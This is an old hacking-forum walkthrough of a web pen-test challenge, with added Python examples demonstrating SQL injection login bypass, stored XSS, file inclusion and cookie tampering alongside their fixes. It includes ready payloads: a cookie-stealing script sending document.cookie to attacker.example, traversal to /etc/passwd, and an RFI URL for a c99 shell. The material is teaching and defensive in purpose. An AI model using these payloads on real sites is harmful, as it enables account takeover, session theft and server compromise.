Wednesday, January 07, 2009

Pen Test Challenge 1
An article on the pentesting challenge. Sorry if it contains spoilers.



+--------------------------------+
|    PEN TEST CHALLENGE ONE!     |
+--------------------------------+

Well, let's start.

Once you get onto the challenge page there are six links to different parts of the site, and there is also a login on the main page. To start off, let's scout the site for anything that may be of use to us. Oh look, an admin panel. Let's think: how do we bypass a login? What is the most obvious way? Try a few methods out and I'm sure after a while you'll get it. If you haven't got it already, think SQL.

The way an SQL login works is that, when the application checks your credentials against the database, it runs something like

SELECT * FROM users WHERE user='[YOUR USERNAME HERE]' AND password='[YOUR PASSWORD HERE]';

Whatever you type into the username field is dropped straight into that statement. So you want an input that does three things: escapes (closes) the current quoted field, adds a condition that is always true, and ends the statement so that whatever follows is ignored. After injection, the part the database actually evaluates looks like

SELECT * FROM users WHERE user='' [ALWAYS-TRUE CONDITION] [COMMENT MARKER]

and the "AND password=" bit is commented out, so the password is never checked at all.
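To make the bypass concrete, here is an added Python example (not the challenge's own code, which is PHP, and not written by the article's author) that builds the login query the way described above and then the way it should be built. The users table, the credentials and the two payloads are constructed for the demo; a real application stores password hashes, not plaintext.

```python
import sqlite3


def make_db():
    """Constructed demo users table (in-memory SQLite, not the challenge's DB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret!"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """The pattern from the article: user input pasted straight into the SQL.
    Returns the matched username, or None when the login fails."""
    query = ("SELECT user FROM users WHERE user='%s' AND password='%s'"
             % (user, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    """Parameterised version: the driver sends the values separately from the
    statement, so a quote or comment sequence in the input never changes it."""
    row = conn.execute(
        "SELECT user FROM users WHERE user=? AND password=?",
        (user, password)).fetchone()
    return row[0] if row else None


# Two payloads that do what the article asks for: close the quoted field,
# optionally add an always-true condition, and comment out the rest so the
# password check is never reached.  '--' starts a comment in SQLite and most
# other engines; the trailing space matters for some of them.
ALWAYS_TRUE = "' OR '1'='1' -- "
NAMED_USER = "admin' -- "


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, ALWAYS_TRUE, "anything"))   # admin
    print(login_vulnerable(db, NAMED_USER, "anything"))    # admin
    print(login_safe(db, ALWAYS_TRUE, "anything"))         # None
    print(login_safe(db, "bob", "hunter2"))                # bob
```

With ALWAYS_TRUE the engine sees `WHERE user='' OR '1'='1'` followed by a comment, so every row matches and the first one (admin) is returned; with NAMED_USER the condition is just `user='admin'`. The parameterised query treats both payloads as a literal username that does not exist.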

Hopefully you now have the points for the admin login vulnerability. Let's move on.

The next one I'm going to explain is an exploit in the member's tools, in another part of the site. You need to check every field you can for this exploit. The vulnerability is generally used by attackers to plant cookie stealers on a site. (If it helps, use Firefox's TamperData add-on.)

This is quite an easy one. The only problem with it is that you have to search every field. God, George Bush Sucks.
Hopefully now you understand what I mean.
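An added Python example of the field-by-field check, not code from the challenge or its author: a toy renderer for a member's profile that drops each field into the page unescaped, its escaped counterpart, and a probe that submits a canary into every field in turn and reports which ones come back as live markup. The field names, the renderer and the cookie-stealer payload (pointing at attacker.example) are all constructed for the demo.

```python
import html

FIELDS = ["name", "location", "signature"]   # constructed profile fields

# Constructed payload of the kind the article means by "cookie stealer".
COOKIE_STEALER = ("<script>new Image().src='http://attacker.example/steal?c='"
                  "+document.cookie</script>")


def render_profile_vulnerable(fields):
    """Toy 'member's tools' page: each stored field is echoed into the HTML
    verbatim, so markup in any field runs in every visitor's browser."""
    return "".join("<p>%s: %s</p>" % (name, value)
                   for name, value in fields.items())


def render_profile_safe(fields):
    """Same page with output encoding: html.escape turns <, >, &, " and ' into
    entities, so the browser shows the input as text instead of executing it."""
    return "".join("<p>%s: %s</p>" % (html.escape(name),
                                      html.escape(value, quote=True))
                   for name, value in fields.items())


def probe_fields(field_names, render):
    """The 'check every field' step: put a distinct, harmless canary tag into one
    field at a time and see whether it survives into the page unescaped."""
    vulnerable = []
    for target in field_names:
        canary = "<xss-%s>" % target
        submission = {name: (canary if name == target else "")
                      for name in field_names}
        if canary in render(submission):
            vulnerable.append(target)
    return vulnerable


if __name__ == "__main__":
    print(probe_fields(FIELDS, render_profile_vulnerable))   # all three fields
    print(probe_fields(FIELDS, render_profile_safe))         # []
    print(render_profile_vulnerable({"signature": COOKIE_STEALER}))
```

TamperData lets you edit the POST body after the page's own JavaScript has run, which is why the article recommends it: client-side filtering in the form is no protection against a probe like this. Marking the session cookie HttpOnly stops document.cookie from reading it, but only output encoding like render_profile_safe removes the injection itself.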


Now we move on to another common attack, generally used by script kiddies with NetTools or other forms of skiddie programs. This is found on a different page; I'll let you find it yourself. It's located where people find out new information about the world and other events which are going on. That page contains a lot of information that is useful for the exploit. The exploit should overflow the connection. How do you send lots of data at once to overflow it?

That's right. All the information you need is given on the page. Check whether some of the information that is shared between the pages is vulnerable to an overflow, then enter overflow data into it and voilà, you've got it. :)

Only two things left to do.
As I'm sure you've seen, the URL contains '?page=...', which shows that the site is including a file named by that parameter, either local or remote. There is an exploit for this:
http://en.wikipedia.org/wiki/Remote_File_Inclusion


This should tell you most of what you need to know. If it doesn't: RFI, in very short, means that you can take a file from another source and include it on that website, so if you wanted to you could include a backdoor shell (c99 and r57 are two very common ones) on the site. Local File Inclusion does the same but with files already on the server's machine (/etc/passwd, /etc/shadow). This should give you a good indication of what you need to do.
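An added Python model of what an unchecked include($_GET['page']) does, written for this article rather than taken from the challenge (the directory /var/www/site/pages and the page names are assumed). resolve_vulnerable shows where a ?page= value ends up, resolve_contained adds the scheme, NUL-byte and directory-containment checks, and resolve_allowlisted is the simpler fix that most applications should use.

```python
import posixpath
from urllib.parse import urlsplit

PAGES_DIR = "/var/www/site/pages"                       # assumed layout
ALLOWED_PAGES = {"home", "news", "members", "contact"}  # assumed page names
REMOTE_SCHEMES = {"http", "https", "ftp"}


def resolve_vulnerable(page):
    """Models PHP include($_GET['page']) with allow_url_include on: a URL is
    fetched and executed (RFI); anything else is treated as a server path (LFI).
    Returns (kind, location) for the file that would be included."""
    if urlsplit(page).scheme in REMOTE_SCHEMES:
        return ("remote", page)
    return ("local", posixpath.normpath(posixpath.join(PAGES_DIR, page)))


def resolve_contained(page):
    """Reject URLs and other wrappers, NUL bytes, and any path that normalises
    to a location outside PAGES_DIR.  PHP before 5.3.4 truncated include paths
    at a NUL byte, which is why the byte is rejected explicitly."""
    if "\x00" in page or urlsplit(page).scheme:
        return None
    target = posixpath.normpath(posixpath.join(PAGES_DIR, page))
    if not target.startswith(PAGES_DIR + "/"):
        return None
    return ("local", target)


def resolve_allowlisted(page):
    """Preferred fix: the parameter only selects a name from a fixed list, and
    the application builds the path itself."""
    if page not in ALLOWED_PAGES:
        return None
    return ("local", posixpath.join(PAGES_DIR, page + ".php"))


if __name__ == "__main__":
    print(resolve_vulnerable("../../../../etc/passwd"))       # ('local', '/etc/passwd')
    print(resolve_vulnerable("http://attacker.example/c99.txt"))  # ('remote', ...)
    print(resolve_contained("../../../../etc/passwd"))        # None
    print(resolve_allowlisted("news"))                        # ('local', '/var/www/site/pages/news.php')
```

Four `../` steps are enough here because PAGES_DIR is four directories deep; the containment check does not care how many there are, only where the normalised path lands. The allowlist is preferable because it also blocks files that legitimately live under PAGES_DIR but were never meant to be included on their own.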

Last but not least is a cookie exploit (135 points), which is the most important after the DoS exploit (125 points). As I'm sure you noticed, one of the first things about the site was that a session ID was being shown in the URL (PHPSESSID). You want to make the cookies think that you're admin. So, using your brain and TRUE or FALSE values, how would you trick something or someone into thinking that you are admin? Well, I hope you got it.
One last tip: it is somewhere which is a very obvious place to set a variable.
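An added Python model of the cookie problem, not the challenge's code: a check that trusts an admin flag the client sends, a check that keeps the flag server-side keyed by the session id, and an HMAC-signed cookie for the case where a value really must travel with the client. The admin cookie name, the session store and the key are constructed for the demo; only PHPSESSID comes from the article.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

SESSIONS = {}                          # constructed server-side store: sid -> dict
SECRET_KEY = secrets.token_bytes(32)   # demo key; a real app loads it from config


def parse_cookie_header(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def is_admin_vulnerable(cookie_header):
    """Trusts a client-controlled flag: the client can set admin=true itself."""
    cookies = parse_cookie_header(cookie_header)
    return cookies.get("admin", "false").lower() in ("true", "1")


def create_session(username, is_admin):
    """Server-side session: only the opaque id is handed to the client."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": username, "admin": is_admin}
    return sid


def is_admin_safe(cookie_header):
    """Looks the privilege up by session id; any admin cookie is ignored."""
    cookies = parse_cookie_header(cookie_header)
    session = SESSIONS.get(cookies.get("PHPSESSID", ""))
    return bool(session and session["admin"])


def sign_value(value):
    """If state must live in a cookie, append an HMAC so edits are detected."""
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + mac


def verify_value(signed):
    """Return the value if its MAC checks out, else None."""
    value, _, mac = signed.rpartition(".")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    print(is_admin_vulnerable("PHPSESSID=abc123; admin=true"))   # True
    print(is_admin_safe("PHPSESSID=abc123; admin=true"))         # False
    sid = create_session("admin", True)
    print(is_admin_safe("PHPSESSID=%s" % sid))                   # True
    forged = sign_value("admin=false").replace("false", "true")
    print(verify_value(forged))                                  # None
```

Flipping admin=false to admin=true in the Cookie header (or in the URL, since the site exposes the session id there) is the whole attack against the first check. The signed variant still lets the client read the value, so anything secret belongs in the server-side store, and a session id in the URL should be moved into a cookie regardless.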


Well, I hope you enjoyed my article and I would love to get some feedback on what everyone thought.
I hope it helps some people.
Take care. ~x~



~~~~~~~~~~~~~
Shout outs to:
~~~~~~~~~~~~~
Cyph3rHell for helping me complete the challenge myself and just for being really cool.
Zephyr_Pure for checking the article over for me and giving me some changes for it and obviously for publishing it.

Thanks guys.
© HellBound Hackers 2007- 2008. Since 3rd December 2004.